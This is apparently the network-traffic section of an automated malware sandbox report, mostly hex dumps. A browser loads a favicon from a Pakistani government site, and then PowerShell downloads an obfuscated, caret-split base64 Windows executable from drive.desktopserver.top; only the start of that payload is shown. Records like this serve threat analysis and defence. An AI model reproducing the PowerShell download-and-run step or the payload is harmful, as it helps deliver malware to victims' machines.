                                                                                                                                          2024-09-30 16:58:17 UTC888INData Raw: 16 29 24 11 25 09 40 1a 7e da 67 de 36 a9 23 6a c6 58 8c 80 9b 65 82 89 97 32 cc 43 20 b1 86 17 bd 25 a3 cc 5f a4 b2 54 90 48 93 7b 27 0f 2e 10 da c7 05 f9 9d 92 76 3d de 36 e4 36 99 0a 73 f3 5f ec e9 da 0b a4 2a f4 fe c2 ab a0 9f 27 b8 12 b6 f9 8d b1 b9 b2 d1 ad f8 02 65 5a f7 10 89 6a 69 c2 19 0b 69 69 f2 d9 27 3f a2 ee 80 5a 4a 4f fe 8b 21 e4 0b 59 2c 97 2c df 8f 2d 96 a6 c8 ad 62 7b 1c 55 44 7a d9 bc 9a 43 13 88 14 56 6e 34 77 75 0e b4 df f1 81 9b 86 52 43 de 1b 19 bd 59 28 e4 3b 1f ab de 4f 86 08 ac 69 8a 8e d1 f3 41 24 3a 5a 8b f9 e5 31 34 51 21 52 38 cf 50 e3 53 39 c6 8b 06 d6 58 d6 b1 42 26 47 56 5e d1 ab f0 43 2e fa f4 f2 92 74 98 02 4c 3a 7d 0a 34 58 20 56 75 66 b9 9a 97 95 e7 cf af 4e 72 14 64 de bc 24 dd cf 1f c3 45 5e c5 11 43 bf 0e 20 2c bb
                                                                                                                                          Data Ascii: )$%@~g6#jXe2C %_TH{'.v=66s_*'eZjiii'?ZJO!Y,,-b{UDzCVn4wuRCY(;OiA$:Z14Q!R8PS9XB&GV^C.tL:}4X VufNrd$E^C ,
                                                                                                                                          2024-09-30 16:58:17 UTC1448INData Raw: 93 e8 c8 b4 5c f0 a5 b0 35 64 b9 b7 3d 93 11 4b 66 f7 a2 a3 47 68 d0 a2 47 78 59 73 3a 8e be 2d a0 32 db fc ba 1c 2b 50 71 81 4c 59 e7 bc d1 5d b7 44 6e b3 96 20 b6 5a d7 c0 16 d7 41 5f b9 55 51 69 25 c3 b0 a2 04 12 48 4f 42 5a 28 7b 60 2f e2 84 b9 e1 aa 3f e6 5b 69 78 3f 34 20 2c d5 e1 fa b6 b5 79 79 bf 83 7c 41 bd f8 fb 79 a9 cd 65 ce a0 9f e1 5a f4 b0 cc 19 54 29 ca f0 34 57 bc d9 a7 54 a1 cf 46 85 0d 37 53 48 1b 34 35 69 07 48 81 fc 78 2c 2d 67 d7 7e d5 41 ae 5f 4c cb 51 16 7b ec cf c7 02 7a b1 12 d9 4a 63 ef fb 17 a7 e1 67 9a b1 e6 5f 14 97 26 59 1a 35 76 d4 46 d5 7a 74 b3 35 39 34 1c b0 46 31 6a f2 19 95 c0 3a a2 e1 92 2f 90 dc b3 a5 2e 93 8d 6d 69 c5 27 99 ef 4f cb 6f bc 7c 05 99 e5 ab 5d 92 a7 ee 81 09 97 5f f8 79 c1 cd 9b 14 01 24 4b f7 44 26 ec
                                                                                                                                          Data Ascii: \5d=KfGhGxYs:-2+PqLY]Dn ZA_UQi%HOBZ({`/?[ix?4 ,yy|AyeZT)4WTF7SH45iHx,-g~A_LQ{zJcg_&Y5vFzt594F1j:/.mi'Oo|]_y$KD&
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: 0f 88 87 83 61 38 87 e1 e7 51 97 c5 dd d3 92 d2 70 34 e5 a2 44 1a 1d 8b a1 c9 54 2f 68 60 c8 d3 a7 29 6d 60 fb 67 70 fa 58 69 72 c0 4a 94 b5 20 1a 52 6b 3e b0 54 f9 72 89 68 20 5b 9a 3c 1e cb cb 9f 8c 52 2b 97 81 4c 22 bd 7d b9 6c 1a a0 c9 31 46 6c 21 dc fa 70 c2 28 13 a2 17 02 8b aa 31 e2 16 77 b1 c4 03 52 dc d9 f2 97 32 4e 6d 68 1e a5 79 48 d5 b6 0c e9 31 fb c0 c8 ec 08 08 c0 a2 b4 0a f6 88 73 91 28 06 a0 af 63 49 ad 9e e4 0a 43 db 73 8a a3 da e4 39 c9 1a e8 c2 87 be b8 b2 37 6f 1b 43 9e 9f dc a2 0e b5 1c 2f 27 21 4b 98 6a 7c fa 12 b1 c7 b3 ec df fd 58 d8 4e c8 46 01 c2 b0 bb 9c 90 23 a6 bd 79 99 7d 4a db 16 51 39 36 a4 ea 4a cf 60 36 38 1b 7f c9 19 4b 44 03 03 13 db ce 63 c8 86 ed 42 32 77 3d ee b2 94 93 30 75 39 5a d1 99 a7 2b 05 2b 45 04 9e d0 38 c5
                                                                                                                                          Data Ascii: a8Qp4DT/h`)m`gpXirJ Rk>Trh [<R+L"}l1Fl!p(1wR2NmhyH1s(cICs97oC/'!Kj|XNF#y}JQ96J`68KDcB2w=0u9Z++E8
                                                                                                                                          2024-09-30 16:58:18 UTC4048INData Raw: 07 18 88 a9 1f 6c 35 93 f8 8a 92 bd 2c 6f 59 e2 71 d4 a1 93 88 fb b1 ac da 37 5e c5 ee 48 ec fd a5 eb 11 04 b2 57 d9 04 77 74 00 69 41 b9 31 dd 37 da ab 89 b4 4c a7 25 fd d8 5a 30 7a 5e 07 77 8d 0a 5a 99 f2 f7 21 b0 2a d3 78 0a d5 ee 1b c7 b3 f1 81 14 9f c9 ba 1a 15 76 dd 2b c7 1d 91 a5 e6 55 54 59 92 d5 d9 5f 74 05 82 c9 b1 59 2e 9a 9d 5f 0d b0 8e 7c 35 91 20 22 2f c4 94 b8 1a b8 22 68 b1 db de 11 b1 2b 18 cd 5b 05 f9 8b 2d cb b9 17 a9 b4 c0 7e 69 f2 26 ad 0c 19 90 3a 54 99 de 98 08 ba 77 fd 6e 17 70 be b1 b9 77 65 c9 99 2e 57 9e 37 79 00 92 e4 b5 2b 6c 9a 4d fe 1c e9 e9 27 87 b8 5b fe ab 9a 24 2e 2c aa 25 42 45 71 16 79 b8 2c aa 62 d9 03 e9 dd 72 ad b8 f8 e9 10 ea 0a 64 f4 e6 af 9a 6b 6b 4f 7b 8a 8c ad 7e 20 01 15 13 64 ec aa 55 8b ae 30 a0 95 dc 6a 0f
                                                                                                                                          Data Ascii: l5,oYq7^HWwtiA17L%Z0z^wZ!*xv+UTY_tY._|5 "/"h+[-~i&:Twnpwe.W7y+lM'[$.,%BEqy,brdkkO{~ dU0j
                                                                                                                                          2024-09-30 16:58:18 UTC4048INData Raw: a8 f7 27 6c 96 40 e2 53 6b 76 f6 b8 be 91 3d 00 00 1a 1c 6b e4 e1 de c2 e5 b5 c6 96 ec f9 39 db 04 cb 3a 71 58 bb 96 70 d3 42 ed 3a bc 86 33 27 6f 43 e2 e1 12 c2 66 c5 66 d1 25 46 68 d1 39 aa 64 4d 4e 70 15 e2 75 1d cf 19 d4 6d b9 17 96 97 23 e1 2a 86 1e ef f5 c5 9d c6 52 29 59 83 4e c4 92 53 92 96 da 9c d8 17 5f 04 ef 81 51 3e 0d 9d 8f 28 7c 91 4e 9e 8b e2 62 48 a7 18 62 48 cd 36 8a 86 15 4a 90 fc 44 22 6a 2f 2f b3 5d fc 06 5d ce 36 3d 48 50 18 6c 89 3b 5e e7 7b 54 c7 9b 15 e9 5b 13 63 b8 50 85 47 4e 1a 7e a5 cb 97 3d f3 b2 7f 4e bd 74 ce 62 31 1f d9 cb a3 ca cd b1 7d 64 17 54 9d 2a 46 d0 6c 93 6a 6b 51 18 38 e0 a9 6a 2d dd 27 3b ec 9d d2 9e 51 09 1c 5e 59 3a 4c ad 52 41 43 0b 3e 30 d3 5f 0a a4 e7 6b 1d 35 ab 63 48 f1 20 48 24 e6 f0 44 9e 0c 70 f4 ab bc
                                                                                                                                          Data Ascii: 'l@Skv=k9:qXpB:3'oCff%Fh9dMNpum#*R)YNS_Q>(|NbHbH6JD"j//]]6=HPl;^{T[cPGN~=Ntb1}dT*FljkQ8j-';Q^Y:LRAC>0_k5cH H$Dp
                                                                                                                                          2024-09-30 16:58:18 UTC4048INData Raw: 08 f7 ca 3d 3c 84 ab ee 45 78 82 74 98 62 16 14 31 a5 60 65 9e 3e 15 28 c4 25 2c fc 78 54 4a e5 2b e7 97 c2 80 b2 7e cf ee 4b 77 59 f5 49 69 15 57 8f 30 62 6f 07 d3 ce 1c 34 17 a9 cc 67 4a 7e 7a d0 cb 9c 36 a6 48 5f 42 1c 48 35 5b 85 d2 4f 82 4f 0c d1 38 db 29 30 54 e1 88 a0 9a d1 1c 65 5d cc 27 36 ab 83 d5 b7 c2 b4 e8 a3 df a6 9a d9 eb b6 d1 91 fc b5 3a 52 65 d3 5f cc a4 2d cf 8e 46 47 f6 a6 6d f9 24 44 b7 e4 48 d4 cf 55 a3 3d 3c 35 4c 3a 1e ed 99 08 7f 73 7b 1f 19 fa 49 8a b2 ec 7c 19 88 90 3b 5c fa 73 d8 43 ee 72 1c 17 cf 01 75 53 7e 21 4a 85 7e 22 e3 3a 5c d6 8e 53 47 64 2b 77 a5 4a 9d 53 c7 a1 bc b0 3d 2d 66 c7 70 fc ed 56 b4 4f 96 f0 a0 2e f5 d9 b6 62 5e df 5e 27 ab 30 c2 a3 1a 0a 4c ca 8a 85 e0 f5 4d 27 e4 c8 1a e6 b9 bd ae 37 17 07 8e ee d4 bd f9
                                                                                                                                          Data Ascii: =<Extb1`e>(%,xTJ+~KwYIiW0bo4gJ~z6H_BH5[OO8)0Te]'6:Re_-FGm$DHU=<5L:s{I|;\sCruS~!J~":\SGd+wJS=-fpVO.b^^'0LM'7


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.549738203.101.184.864437768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:17 UTC403OUTGET /favicon.ico HTTP/1.1
                                                                                                                                          Host: mora.gov.pk
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                                                                                                                                          2024-09-30 16:58:17 UTC605INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                          Last-Modified: Tue, 05 Dec 2023 11:55:06 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "db7d5de37127da1:0"
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Xss-Protection: 1
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                          X-UA-Compatible: IE=edge,chrome=1
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:16 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 32038
                                                                                                                                          Content-Security-Policy: self
                                                                                                                                          Feature-Policy: self
                                                                                                                                          2024-09-30 16:58:17 UTC3443INData Raw: 00 00 01 00 04 00 10 10 00 00 00 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 ae 04 00 00 30 30 00 00 00 00 20 00 a8 25 00 00 56 15 00 00 40 40 00 00 00 00 20 00 28 42 00 00 fe 3a 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 d2 d1 83 cf cd cc 85 cf cc cb 85 cf cc cb 85 cf cc ca 85 ce cb ca 85 ce cb c9 85 bf bd bc b9 ce cc cb dd cd ca c9 dd cc c8 c6 dd cb c6 c4 dd cc c5 c3 db cb c5 c1 db cb c4 c1 db b6 b0 ae c1 f1 ee ec ff f4 e7 d6 ff f1 e1 ca ff ee e1 d0 ff ea e6 e4 ff e9 e5 e3 ff e9 e4 e2 ff e5 e2 e0 ff fd fb fa ff fc f9 f7 ff fb f6 f4 ff fa f4 f1 ff fa f2 ef ff f9 f1 ed ff f9 f1 ed ff df d7 d4 df f1 ee ee ff db b3 75 ff d0 9d 4c ff d0 ab 6e ff fc
                                                                                                                                          Data Ascii: hF 00 %V@@ (B:( @uLn
                                                                                                                                          2024-09-30 16:58:17 UTC41INData Raw: ba 96 ff fe fe fe ff fe fe fe ff fe fe fe ff f5 f3 f1 ff ec e8 e6 ff ec e8 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec e7
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: e4 ff ec e7 e4 ff ec e7 e3 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff ec e5 e2 ff ec e5 e1 ff eb e5 e1 ff f4 ee eb ff fc f8 f5 ff fc f7 f4 ff fb f6 f4 ff b9 b9 b9 87 00 00 00 05 e7 e7 e7 ff ff ff ff ff ed d5 b5 ff da a8 65 ff de b2 77 ff de b4 79 ff de b2 77 ff d8 c4 a8 ff ff ff ff ff ff ff ff ff ff ff fe ff f6 f4 f2 ff ed e9 e6 ff ec e8 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec e8 e5 ff ec e7 e4 ff ec e7 e4 ff ec e7 e3 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff ec e5 e2 ff ec e5 e1 ff f4 ef eb ff fc f8 f5 ff fc f8 f5 ff fc f7 f4 ff bb bc bb 87 00 00 00 05 e7 e7 e7 ff ff ff ff ff ed d4 b4 ff d9 a6 61 ff dd af 72 ff d9 a6 61 ff d8 a5 5f ff d4 ba 98 ff ff ff ff ff ff ff ff ff ff ff fe ff f5 f3 f3 ff ec e9 e6 ff ec e9 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec
                                                                                                                                          Data Ascii: ewywara_
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: fa ff fd fa f9 ff e8 e5 e4 ff ef eb ea ff ee eb e9 ff ee eb e9 ff ee ea e8 ff ee e9 e7 ff ee e9 e7 ff ed e8 e6 ff ed e8 e6 ff ed e8 e5 ff e9 e4 e1 ff ec e7 e5 ff fb f5 f2 ff fb f5 f2 ff fa f4 f2 ff fb f5 f2 ff fb f5 f2 ff fa f5 f2 ff 89 87 86 9f db da da ff fc fb f9 ff fd fb f9 ff f2 e4 d0 ff d2 a0 51 ff d1 9e 4e ff d2 a2 54 ff d7 ab 66 ff d1 9e 4d ff d0 9d 4c ff d1 9e 4f ff d0 c3 af ff fd f8 f8 ff fc f8 f8 ff fd f8 f8 ff fd f9 f8 ff fc f9 f8 ff f0 e9 e6 ff ec e4 e0 ff eb e4 e0 ff eb e4 e0 ff dc d6 d2 ff d7 d4 d2 ff fd fd fc ff fe fc fc ff fe fc fb ff fe fc fb ff fd fb fa ff fd fa f9 ff f7 f5 f4 ff f5 f3 f1 ff f5 f2 f1 ff f5 f2 f0 ff f5 f1 ef ff f5 f1 ef ff f5 f1 ee ff f5 f0 ed ff f4 ef ed ff f4 ef ed ff f4 ef ed ff f7 f2 f0 ff fb f5 f3 ff fb f5 f3 ff fb
                                                                                                                                          Data Ascii: QNTfMLO
                                                                                                                                          2024-09-30 16:58:17 UTC2336INData Raw: e5 fb ec e9 e6 fd ec e8 e4 ff ec e7 e3 ff ec e6 e2 ff eb e5 e1 ff eb e4 e1 ff eb e4 e1 ff ef ea e6 fd fc f9 f7 f9 fc f8 f6 f9 fc f8 f6 fb fc f8 f6 fb fc f8 f5 fd c6 c6 c5 c3 00 00 00 0d 00 00 00 03 db db db ff ff ff ff ff ff ff ff ff f6 ea da ff da a8 68 ff da a7 64 ff db ab 6b ff df b4 7a ff da a7 64 ff d9 a6 63 ff da a9 66 ff d2 c6 b5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f1 ef ed ff ec e9 e6 ff ed e9 e6 ff ec e9 e6 ff ec e9 e6 ff ec e9 e6 ff fa f9 f7 ff fa f8 f7 ff ec e9 e6 ff ec ea e7 ff ed ea e7 ff ed ea e6 ff ec ea e7 ff ed ea e7 ff ed ea e6 ff ec ea e7 ff ec e8 e6 ff ec e7 e4 fd ec e7 e3 ff ec e6 e1 ff eb e5 e1 ff eb e4 e1 ff ef eb e6 ff fc f9 f6 ff fc f8 f5 ff fc f8 f5 ff fc f7 f5 ff fc f7 f4 ff c8 c8 c7 c3 00 00 00 0b 00
                                                                                                                                          Data Ascii: hdkzdcf
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: e0 ff e2 e2 e2 bf e0 e0 e0 21 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 db db db ff e7 e7 e7 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff d5 d5 d5 ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe fe ff fc fc fc ff fd fd fd ff fa fa fa ff f7 f7 f7 ff f3 f3 f3 ff ce ce ce ff c6 c6 c6 ff e2 e2 e2 ff e5 e5 e5 cf e3 e3 e3 21 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff
                                                                                                                                          Data Ascii: !!
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: f9 ff fd f9 f9 ff fd f9 f9 ff fd f9 f9 ff d2 a1 56 ff d1 9f 50 ff d1 9e 4f ff d0 9c 4b ff d8 ad 6a ff da b2 72 ff d9 b1 6f ff d9 b0 6e ff d9 b3 73 ff da b2 70 ff d0 d0 d0 ff fc f9 f7 ff fc f9 f7 ff fc f9 f7 ff fc f9 f7 ff fd f9 f6 ff fc f9 f7 ff fc f9 f6 ff fd f9 f6 ff fd f9 f6 ff fc f8 f5 ff fc f8 f5 ff fc f8 f5 ff fc f8 f4 ff bc b9 b7 ff fe fd fc ff fe fd fc ff fe fc fc ff fe fc fb ff fe fc fb ff fe fb fa ff fd fb fa ff fd fb f9 ff fd fa f8 ff e1 de dd ff fd f9 f7 ff fc f8 f7 ff fc f8 f6 ff fc f7 f5 ff fc f7 f5 ff fc f7 f4 ff fb f6 f4 ff fb f6 f3 ff fb f5 f3 ff fb f5 f2 ff fb f5 f2 ff fb f4 f1 ff fb f4 f1 ff df d9 d7 ff fa f4 f1 ff fa f3 f0 ff fa f3 f0 ff fa f3 f0 ff fa f3 f0 ff fa f4 f0 ff fa f4 f1 ff fb f4 f1 ff fb f4 f1 ff 3e 3e 3e 7f d0 d0 d0 ff fd
                                                                                                                                          Data Ascii: VPOKjronsp>>>
                                                                                                                                          2024-09-30 16:58:18 UTC4048INData Raw: e1 ff e4 e2 e1 ff e4 e2 e1 ff e4 e1 e1 ff e4 e1 e1 ff e4 e1 e1 ff e4 e2 e1 ff e4 e2 e1 ff e4 e2 e1 ff e4 e2 e1 ff 42 42 42 7f d0 d0 d0 ff ff fe fd ff ff fe fd ff ff fe fd ff ff fe fd ff d8 a7 61 ff d6 a3 5a ff d5 a3 5a ff d5 a1 55 ff df b9 81 ff d7 a8 61 ff d5 a2 57 ff d5 a2 56 ff d6 a5 5c ff d6 a3 5a ff d0 d0 d0 ff fe fd fd ff fe fd fd ff fe fd fd ff fe fd fd ff fe fd fd ff fe fd fc ff fe fd fd ff ec e8 e6 ff ec e8 e5 ff ec e8 e4 ff ec e7 e4 ff ec e7 e4 ff ec e7 e4 ff b1 ae ac ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e5
                                                                                                                                          Data Ascii: BBBaZZUaWV\Z
                                                                                                                                          2024-09-30 16:58:18 UTC4048INData Raw: e7 ff ed ea e7 ff ed ea e7 ff ed e9 e6 ff ed e7 e4 ff ed e8 e4 fd ec e7 e2 ff ec e6 e2 ff ec e5 e1 ff eb e5 e1 ff eb e4 e2 ff eb e6 e1 ff fc f9 f6 ff fc f9 f6 ff fd f8 f5 ff fc f8 f6 ff fc f8 f5 ff fd f8 f5 ff fc f7 f4 ff cb cb ca ff 00 00 00 0f 00 00 00 09 ff ff ff 01 d0 d0 d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff dc ab 6d ff da a7 65 ff da a7 65 ff d9 a5 61 ff e3 bd 8a ff dc ac 6c ff da a6 62 ff d9 a6 62 ff db a9 68 ff da a9 66 ff d0 d0 d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed ea e6 ff ed e9 e6 ff ed ea e6 ff ed e9 e6 ff ec e9 e6 ff ff fe fe ff ff fe fe ff ec e9 e6 ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed ea e7 ff ed
                                                                                                                                          Data Ascii: meealbbhf
                                                                                                                                          2024-09-30 16:58:18 UTC1930INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc fc fc ff fd fd fd ff fd fd fd ff fd fd fd ff fb fb fb ff f8 f8 f8 ff f5 f5 f5 ff de de de ff a9 a9 a9 ff eb eb eb ff da da da ff e6 e6 e6 ff e3 e3 e3 ff ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 d9 d9 d9 ff e0 e0 e0 ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff de de de ff d0 d0 d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii:


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.549742104.21.92.1894438288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:20 UTC177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:21 UTC628INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:21 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yS0RUlm3oRj7R%2BkoFByBbJ%2BDrhqEXjuKggbYVNnbDPDMU09jt%2B2h7p7JgeWiITGV68Liuv%2BRKlLTTzxnE7dcBRlWACTtZmUgMLe6WmXR4BVtH4jVm7F0MhX8N5bFhj%2B92mwwbweoeAtoiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1d89b92c3f5-EWR
                                                                                                                                          2024-09-30 16:58:21 UTC741INData Raw: 37 64 32 61 0d 0a 54 56 71 51 41 5e 41 4d 41 41 41 5e 41 45 41 41 41 5e 41 2f 2f 38 41 5e 41 4c 67 41 41 5e 41 41 41 41 41 5e 41 41 51 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 67 41 41 41 41 5e 41 34 66 75 67 5e 34 41 74 41 6e 5e 4e 49 62 67 42 5e 54 4d 30 68 56 5e 47 68 70 63 79 5e 42 77 63 6d 39 5e 6e 63 6d 46 74 5e 49 47 4e 68 62 5e 6d 35 76 64 43 5e 42 69 5a 53 42 5e 79 64 57 34 67 5e 61 57 34 67 52 5e 45 39 54 49 47 5e 31 76 5a 47 55 5e 75 44 51 30 4b 5e 4a 41 41 41 41 5e 41 41 41 41 41 5e 42 51 52 51 41 5e 41 54 41 45 44 5e 41 45 6d 6b 38 5e 6d 59 41 41 41 5e 41 41 41 41 41 5e 41 41 4f 41 41 5e 44 69 45 4c 41 5e 54 41 41
                                                                                                                                          Data Ascii: 7d2aTVqQA^AMAAA^AEAAA^A//8A^ALgAA^AAAAA^AAQAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^gAAAA^A4fug^4AtAn^NIbgB^TM0hV^Ghpcy^Bwcm9^ncmFt^IGNhb^m5vdC^BiZSB^ydW4g^aW4gR^E9TIG^1vZGU^uDQ0K^JAAAA^AAAAA^BQRQA^ATAED^AEmk8^mYAAA^AAAAA^AAOAA^DiELA^TAA
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 47 39 5e 6a 41 41 41 4d 5e 41 41 41 41 41 5e 45 41 49 41 41 5e 41 43 41 41 41 5e 41 37 67 63 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 51 41 41 41 5e 51 67 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 43 41 42 5e 67 67 41 41 41 5e 41 41 41 45 67 5e 41 41 41 41 43 5e 41 41 55 41 6d 5e 45 55 46 41 4e 5e 68 49 41 67 41 5e 42 41 41 41 41 5e 41 41 41 41 41 5e 48 43 4f 42 77 5e 42 6e 64 41 41 5e 41 6a 51 55 49 5e 41 49 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 42 5e 4d 77 41 77 41 5e 46 41 51 41 41 5e 41 51 41 41 45 5e 53 73 46 4b 4f 5e 6a 4e 4a 57 41 5e 67 41 67 41 41 5e 41 50 34 4f 41 5e
                                                                                                                                          Data Ascii: G9^jAAAM^AAAAA^EAIAA^ACAAA^A7gcA^AAAAA^AAAAA^AAAAA^AQAAA^QgAAA^AAAAA^AAAAA^AAAAA^AACAB^ggAAA^AAAEg^AAAAC^AAUAm^EUFAN^hIAgA^BAAAA^AAAAA^HCOBw^BndAA^AjQUI^AIAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAB^MwAwA^FAQAA^AQAAE^SsFKO^jNJWA^gAgAA^AP4OA^
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 41 5e 6f 71 77 45 41 5e 42 69 55 6d 67 5e 41 51 41 41 41 5e 51 67 42 67 41 5e 41 41 44 67 7a 5e 2f 2f 2f 2f 49 5e 49 77 41 41 41 5e 41 6f 45 51 41 5e 41 42 69 55 6d 5e 67 41 59 41 41 5e 41 51 67 42 41 5e 41 41 41 44 67 5e 59 2f 2f 2f 2f 5e 66 6d 63 43 41 5e 41 51 6f 42 41 5e 67 41 42 69 55 5e 6d 49 4b 4d 41 5e 41 41 41 6f 45 5e 51 41 41 42 69 5e 55 6d 66 6d 67 5e 43 41 41 51 6f 5e 43 41 67 41 42 5e 69 68 67 41 67 5e 41 47 66 6d 6b 5e 43 41 41 51 6f 5e 44 41 67 41 42 5e 69 55 6d 49 4b 5e 59 41 41 41 41 5e 6f 45 51 41 41 5e 42 69 43 70 41 5e 41 41 41 4b 42 5e 45 41 41 41 59 5e 6c 4a 6e 35 71 5e 41 67 41 45 4b 5e 42 41 49 41 41 5e 61 41 42 77 41 5e 41 42 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 47 51 49 5e 41 42 44 6d 73 5e 2f 76 2f 2f 4a 5e 69
